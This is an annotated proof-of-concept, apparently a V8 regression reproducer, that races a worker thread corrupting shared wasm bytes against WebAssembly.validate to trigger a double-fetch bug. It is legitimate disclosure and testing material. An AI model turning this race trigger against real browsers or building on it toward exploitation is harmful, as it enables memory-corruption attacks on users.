- Report: Dec 2017
- Fix: Jan 2018
- Credit: Guang Gong of Alpha Team, Qihoo 360
// Source text for the worker thread, kept as a string and handed to `new Worker(...)`.
// What the worker does, as written:
//   - wraps the received message in a Uint8Array; the handler treats its argument
//     as the buffer itself rather than as a MessageEvent, so this presumably relies
//     on the d8 shell's worker API (confirm against the d8 version in use);
//   - loops forever: picks a random index, saves the byte there, overwrites it with
//     a random value, spins in an empty loop for `value` iterations, then restores
//     the saved byte. Each corruption is therefore transient.
// NOTE(review): `index` ranges over 1..ta.length, so byte 0 is never touched and
// index === ta.length is out of bounds (a no-op on a typed array). `value` ranges
// over 1..256, and 256 wraps to 0 when stored into a Uint8Array.
// The text inside the template literal is runtime data and is left untouched.
var workerScript =
`onmessage = function(sab) {
var ta = new Uint8Array(sab);
var tmp;
while(1){
var index = (Math.random() * ta.length | 0) + 1;
var value = (Math.random() * 256 | 0) + 1;
//print(index + " " +value);
tmp=ta[index];
ta[index]=value;
for(var i=0;i<value;i++);
ta[index]=tmp;
}
};`;
/* Disassembly excerpt kept from the original report; presumably taken from
   ./stack.wasm, which is not shown on this page (byte offset, raw bytes, decoded
   instruction). 41 is the i32.const opcode and ff 0f is the LEB128 encoding of 2047.
000054: 41 ff 0f | i32.const 2047
000057: 6a */
// Regression reproducer: the main thread validates a wasm module whose bytes live
// in shared memory while a worker thread concurrently mutates those same bytes.
// `readbuffer` and `print` are d8 shell helpers, so this does not run unmodified in
// a browser or in Node.
var w = new Worker(workerScript);
var b = readbuffer("./stack.wasm");
var ta = new Uint8Array(b);
// Copy the module into a SharedArrayBuffer of the same size so that a second thread
// can alias the exact bytes handed to the validator.
var sb = new SharedArrayBuffer(b.byteLength);
var sta = new Uint8Array(sb);
for(var i=0;i<ta.length;i++)
sta[i]=ta[i];
// Hand the SharedArrayBuffer to the worker. Shared buffers are shared rather than
// copied, so from here on both threads observe the same memory.
w.postMessage(sb);
// Validate in an endless loop against the shared view. Any decoder that reads a
// module byte more than once (check, then use) can see two different values here:
// a double-fetch / time-of-check-to-time-of-use hazard. The general mitigation for
// this bug class is to snapshot the bytes into private memory before decoding; the
// fix that actually shipped is not shown on this page.
// NOTE(review): there is no pass/fail assertion and no exit condition; exceptions
// are only printed. A regression would presumably surface as a crash or a sanitizer
// report, so run this under a time limit.
while(1){
try{
var result= WebAssembly.validate(sta);
}catch(e){print(e)}
}